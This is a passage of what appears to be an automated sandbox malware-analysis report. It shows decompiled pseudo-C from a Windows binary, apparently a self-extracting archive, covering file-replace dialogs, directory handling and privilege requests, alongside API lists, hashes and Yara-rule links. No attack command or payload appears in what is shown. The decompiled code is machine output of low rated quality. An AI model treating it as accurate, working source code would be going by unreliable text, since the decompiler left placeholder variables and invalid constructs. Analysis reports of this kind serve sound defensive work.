            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: 761923f587479007e9808d9099a710f6226a451bbdbb69d7c923b9f9f0aab1ba
          • Instruction ID: a31ad9a8102ac181a378a9cf67427b78b66feb23d643699433f42edd26352509
          • Opcode Fuzzy Hash: 761923f587479007e9808d9099a710f6226a451bbdbb69d7c923b9f9f0aab1ba
          • Instruction Fuzzy Hash: 60B0129127A211FF730461D07E42C36420DD5F1B1D330801BF400C80D294819C320032
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D1EC, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
          Download Yara Rule
          C-Code - Quality: 22%
          			E0020D1EC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x22ab6c); // executed
				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








          0x0020d1b1
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: ebcccc73ac6731f828a305630d00315aa4b260c5dbd4daa4cc85338087ad8a0b
          • Instruction ID: 846748c77fb37a25c3a9af21315930ed9c0d88383056b208bc832de228ff019a
          • Opcode Fuzzy Hash: ebcccc73ac6731f828a305630d00315aa4b260c5dbd4daa4cc85338087ad8a0b
          • Instruction Fuzzy Hash: 64A011A22BA202BEB30822C8BC02C3A020CC0C2F2A3B0880AF80A800C2A88008200032
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D1F6, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
          Download Yara Rule
          C-Code - Quality: 22%
          			E0020D1F6() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x22ab6c); // executed
				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








          0x0020d1b1
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: 77831a7d4bffd4642e4c890874d31ccdd066bbce30547b49afc31f94f3cd73c1
          • Instruction ID: 846748c77fb37a25c3a9af21315930ed9c0d88383056b208bc832de228ff019a
          • Opcode Fuzzy Hash: 77831a7d4bffd4642e4c890874d31ccdd066bbce30547b49afc31f94f3cd73c1
          • Instruction Fuzzy Hash: 64A011A22BA202BEB30822C8BC02C3A020CC0C2F2A3B0880AF80A800C2A88008200032
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D1D8, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
          Download Yara Rule
          C-Code - Quality: 22%
          			E0020D1D8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x22ab6c); // executed
				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








          0x0020d1b1
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: 99d3c89ad21aabc07c6b254696d523a39af07e95dc395d67a23331f0b12e9d13
          • Instruction ID: 846748c77fb37a25c3a9af21315930ed9c0d88383056b208bc832de228ff019a
          • Opcode Fuzzy Hash: 99d3c89ad21aabc07c6b254696d523a39af07e95dc395d67a23331f0b12e9d13
          • Instruction Fuzzy Hash: 64A011A22BA202BEB30822C8BC02C3A020CC0C2F2A3B0880AF80A800C2A88008200032
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D225, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
          Download Yara Rule
          C-Code - Quality: 22%
          			E0020D225() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x22ab8c); // executed
				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








          0x0020d212
          0x0020d217
          0x0020d21e

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D217
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: 21ea45a7d2adc3090b6efcc064893484b87696b27d59db70f552c3f995a2672d
          • Instruction ID: a206bdfcdd248f786da3fd08be46b5451c97750478b3b6a9323fe696f9719ae1
          • Opcode Fuzzy Hash: 21ea45a7d2adc3090b6efcc064893484b87696b27d59db70f552c3f995a2672d
          • Instruction Fuzzy Hash: AAA012C51BB201BD720411C07D02C36070CC4D1B293B08409F801800C7548048200031
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D22F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
          Download Yara Rule
          C-Code - Quality: 22%
          			E0020D22F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x22ab8c); // executed
				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








          0x0020d212
          0x0020d217
          0x0020d21e

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D217
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: 8bdb89fa8fc6c2b26b846b7cb6a4ccfbbc01d01579a2950f3dbcb57b70a02c4d
          • Instruction ID: a206bdfcdd248f786da3fd08be46b5451c97750478b3b6a9323fe696f9719ae1
          • Opcode Fuzzy Hash: 8bdb89fa8fc6c2b26b846b7cb6a4ccfbbc01d01579a2950f3dbcb57b70a02c4d
          • Instruction Fuzzy Hash: AAA012C51BB201BD720411C07D02C36070CC4D1B293B08409F801800C7548048200031
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D200, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
          Download Yara Rule
          C-Code - Quality: 22%
          			E0020D200() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x22ab6c); // executed
				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








          0x0020d1b1
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          • Opcode ID: b937d6e187766c4880d5f520e27c79c0f5c81253f2257dbc0d0a87e550b81232
          • Instruction ID: 846748c77fb37a25c3a9af21315930ed9c0d88383056b208bc832de228ff019a
          • Opcode Fuzzy Hash: b937d6e187766c4880d5f520e27c79c0f5c81253f2257dbc0d0a87e550b81232
          • Instruction Fuzzy Hash: 64A011A22BA202BEB30822C8BC02C3A020CC0C2F2A3B0880AF80A800C2A88008200032
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9BD6, Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E001F9BD6(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}




          0x001f9bd9
          0x001f9be2
          0x001f9be5

          APIs
          • SetEndOfFile.KERNELBASE(?,001F8F33,?,?,-00001960), ref: 001F9BD9
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: File
          • String ID:
          • API String ID: 749574446-0
          • Opcode ID: 97bb3c5d3e92bda3c6f48c4757bfc82cc30669834d2827e53ff5653dc213ace0
          • Instruction ID: 958b0ac2abe675913133b1e849c21b3908b5380730185a22edddab3ad169d5c4
          • Opcode Fuzzy Hash: 97bb3c5d3e92bda3c6f48c4757bfc82cc30669834d2827e53ff5653dc213ace0
          • Instruction Fuzzy Hash: 4CB012300A0005A68E102B30DC089143A15F62130630051606002C5060CB13C0179600
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00209A8D, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E00209A8D(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}




          0x00209a91
          0x00209a99
          0x00209a9d

          APIs
          • SetCurrentDirectoryW.KERNELBASE(?,00209CE4,C:\Users\user\Desktop,00000000,002385FA,00000006), ref: 00209A91
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CurrentDirectory
          • String ID:
          • API String ID: 1611563598-0
          • Opcode ID: 2376ee83eb1837f3d1727660edfbdeecc0dbb957654538ed6c4b0e0a5d0d64e3
          • Instruction ID: 6ba3de4a86ddaaaf71bdd33d38fdfdb4acc6a30fd729c1113e51e00c273cc946
          • Opcode Fuzzy Hash: 2376ee83eb1837f3d1727660edfbdeecc0dbb957654538ed6c4b0e0a5d0d64e3
          • Instruction Fuzzy Hash: 03A01230194006A68E100B30DD0DC1576515760702F0096207106C40A0CB318824A500
          Uniqueness

          Uniqueness Score: -1.00%

          Non-executed Functions

          Function 0020AFB9, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON
          Download Yara Rule
          C-Code - Quality: 60%
          			E0020AFB9(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t151;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t159;
				intOrPtr _t162;
				void* _t163;
				int _t166;
				int _t169;
				void* _t173;
				void* _t177;
				void* _t179;

				_t156 = __edx;
				_t151 = __ecx;
				E0020D940();
				_t148 = _a6748;
				_t162 = _a6744;
				_t159 = _a6740;
				if(E001F12D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t163 = _t162 - 0x110;
					if(_t163 == 0) {
						SetFocus(GetDlgItem(_t159, 0x6c));
						E001FFAB1( &_a2640, _a6752, 0x800);
						E001FBA19( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t159, 0x65,  &_a2616);
						 *0x22df00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
						_t173 = FindFirstFileW( &_a2596,  &_a288);
						if(_t173 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t166 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E001F3E41( &_a900, 0x200, L"%s %s %s", E001FDA42(_t151, 0x99));
							_t179 = _t177 + 0x18;
							SetDlgItemTextW(_t159, 0x6a,  &_a900);
							FindClose(_t173);
							if((_a308 & 0x00000010) == 0) {
								_push(0x32);
								_push( &_a212);
								_push(0);
								_pop(0);
								asm("adc eax, ebp");
								_push(_a340);
								_push(0 + _a344);
								E00209D99();
								_push(E001FDA42(0 + _a344, 0x98));
								E001F3E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t179 = _t179 + 0x14;
								SetDlgItemTextW(_t159, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
							_t152 =  *0x2375f4; // 0x0
							E0020082F(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E001F3E41( &_a896, 0x200, L"%s %s %s", E001FDA42(_t152, 0x99));
							_t177 = _t179 + 0x18;
							SetDlgItemTextW(_t159, 0x6b,  &_a896);
							_t153 =  *0x24ce14;
							_t157 =  *0x24ce10;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E00209D99(_t157, _t153,  &_a212, 0x32);
								_push(E001FDA42(_t153, 0x98));
								E001F3E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t159, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t163 != 1) {
						goto L27;
					}
					_t169 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t169;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t169);
						L13:
						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0x22df4c(_t137);
						}
						EndDialog(_t159, _t169);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t169 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t169 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}




























          0x0020afb9
          0x0020afb9
          0x0020afbe
          0x0020afc4
          0x0020afcd
          0x0020afd7
          0x0020aff6
          0x0020b000
          0x0020b006
          0x0020b080
          0x0020b09b
          0x0020b0aa
          0x0020b0c0
          0x0020b0dd
          0x0020b0f3
          0x0020b10f
          0x0020b114
          0x0020b127
          0x0020b137
          0x0020b13d
          0x0020b143
          0x0020b144
          0x0020b14a
          0x0020b14d
          0x0020b154
          0x0020b172
          0x0020b17c
          0x0020b184
          0x0020b1a2
          0x0020b1a7
          0x0020b1b5
          0x0020b1b8
          0x0020b1c6
          0x0020b1c8
          0x0020b1da
          0x0020b1e2
          0x0020b1e4
          0x0020b1e5
          0x0020b1e7
          0x0020b1e8
          0x0020b1e9
          0x0020b1f8
          0x0020b213
          0x0020b218
          0x0020b226
          0x0020b226
          0x0020b23c
          0x0020b242
          0x0020b24d
          0x0020b25c
          0x0020b26c
          0x0020b286
          0x0020b29e
          0x0020b2a8
          0x0020b2b0
          0x0020b2cf
          0x0020b2d4
          0x0020b2e2
          0x0020b2ec
          0x0020b2f2
          0x0020b2f8
          0x0020b30c
          0x0020b31b
          0x0020b332
          0x0020b337
          0x0020b345
          0x0020b345
          0x0020b2f8
          0x0020b347
          0x0020b347
          0x0020b349
          0x0020b353
          0x0020b353
          0x0020b00b
          0x00000000
          0x00000000
          0x0020b016
          0x0020b017
          0x0020b019
          0x0020b03d
          0x0020b03d
          0x0020b03f
          0x0020b03f
          0x0020b040
          0x0020b04a
          0x0020b052
          0x0020b055
          0x0020b055
          0x0020b05d
          0x00000000
          0x0020b05d
          0x0020b01b
          0x0020b01e
          0x0020b072
          0x00000000
          0x0020b072
          0x0020b020
          0x0020b023
          0x0020b06f
          0x00000000
          0x0020b06f
          0x0020b025
          0x0020b028
          0x0020b069
          0x00000000
          0x0020b069
          0x0020b02a
          0x0020b02d
          0x00000000
          0x00000000
          0x0020b02f
          0x0020b032
          0x0020b065
          0x00000000
          0x0020b065
          0x0020b037
          0x00000000
          0x00000000
          0x00000000
          0x0020b037
          0x0020aff8
          0x0020affa
          0x00000000

          APIs
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0020B04A
          • EndDialog.USER32(?,00000006), ref: 0020B05D
          • GetDlgItem.USER32(?,0000006C), ref: 0020B079
          • SetFocus.USER32(00000000), ref: 0020B080
          • SetDlgItemTextW.USER32(?,00000065,?), ref: 0020B0C0
          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0020B0F3
          • FindFirstFileW.KERNEL32(?,?), ref: 0020B109
          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0020B127
          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0020B137
          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0020B154
          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0020B172
          • _swprintf.LIBCMT ref: 0020B1A2
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0020B1B5
          • FindClose.KERNEL32(00000000), ref: 0020B1B8
          • _swprintf.LIBCMT ref: 0020B213
          • SetDlgItemTextW.USER32(?,00000068,?), ref: 0020B226
          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0020B23C
          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0020B25C
          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0020B26C
          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0020B286
          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0020B29E
          • _swprintf.LIBCMT ref: 0020B2CF
          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0020B2E2
          • _swprintf.LIBCMT ref: 0020B332
          • SetDlgItemTextW.USER32(?,00000069,?), ref: 0020B345
            • Part of subcall function 00209D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00209DBF
            • Part of subcall function 00209D99: GetNumberFormatW.KERNEL32 ref: 00209E0E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
          • API String ID: 797121971-1840816070
          • Opcode ID: ac30c839278bc9d068f4399890f234dbc592020e7f5390f7aba469d768f423a0
          • Instruction ID: 2bafe37d892c63fbf8a5c3190664f7b3b495c093bcd9e6eb04657c6ccd313433
          • Opcode Fuzzy Hash: ac30c839278bc9d068f4399890f234dbc592020e7f5390f7aba469d768f423a0
          • Instruction Fuzzy Hash: B3919172658349BBD332DBA0DD49FFB77ACEB8A700F000819F749D6082D775AA158762
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F6FC6, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON
          Download Yara Rule
          C-Code - Quality: 83%
          			E001F6FC6(void* __edx) {
				void* __esi;
				signed int _t111;
				signed int _t113;
				void* _t116;
				int _t118;
				intOrPtr _t121;
				signed int _t139;
				int _t145;
				void* _t182;
				void* _t185;
				void* _t190;
				short _t191;
				void* _t197;
				void* _t202;
				void* _t203;
				void* _t222;
				void* _t223;
				intOrPtr _t224;
				intOrPtr _t226;
				void* _t228;
				WCHAR* _t229;
				intOrPtr _t233;
				short _t237;
				void* _t238;
				intOrPtr _t239;
				short _t241;
				void* _t242;
				void* _t244;
				void* _t245;

				_t223 = __edx;
				E0020D870(E0022126D, _t242);
				E0020D940();
				 *((intOrPtr*)(_t242 - 0x18)) = 1;
				if( *0x230043 == 0) {
					E001F7A15(L"SeRestorePrivilege");
					E001F7A15(L"SeCreateSymbolicLinkPrivilege");
					 *0x230043 = 1;
				}
				_t199 = _t242 - 0x2c;
				E001F6ED7(_t242 - 0x2c, 0x1418);
				_t197 =  *(_t242 + 0x10);
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				E001FFAB1(_t242 - 0x107c, _t197 + 0x1104, 0x800);
				 *((intOrPtr*)(_t242 - 0x10)) = E00212B33(_t242 - 0x107c);
				_t232 = _t242 - 0x107c;
				_t228 = _t242 - 0x207c;
				_t111 = E00214DA0(_t242 - 0x107c, L"\\??\\", 4);
				_t245 = _t244 + 0x10;
				asm("sbb al, al");
				_t113 =  ~_t111 + 1;
				 *(_t242 - 0x14) = _t113;
				if(_t113 != 0) {
					_t232 = _t242 - 0x1074;
					_t190 = E00214DA0(_t242 - 0x1074, L"UNC\\", 4);
					_t245 = _t245 + 0xc;
					if(_t190 == 0) {
						_t191 = 0x5c;
						 *((short*)(_t242 - 0x207c)) = _t191;
						_t228 = _t242 - 0x207a;
						_t232 = _t242 - 0x106e;
					}
				}
				E00214D7E(_t228, _t232);
				_t116 = E00212B33(_t242 - 0x207c);
				_t233 =  *((intOrPtr*)(_t242 + 8));
				_t229 =  *(_t242 + 0xc);
				 *(_t242 + 0x10) = _t116;
				if( *((char*)(_t233 + 0x618f)) != 0) {
					L9:
					_push(1);
					_push(_t229);
					E001F9D3A(_t199, _t242);
					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
						_t118 = CreateDirectoryW(_t229, 0);
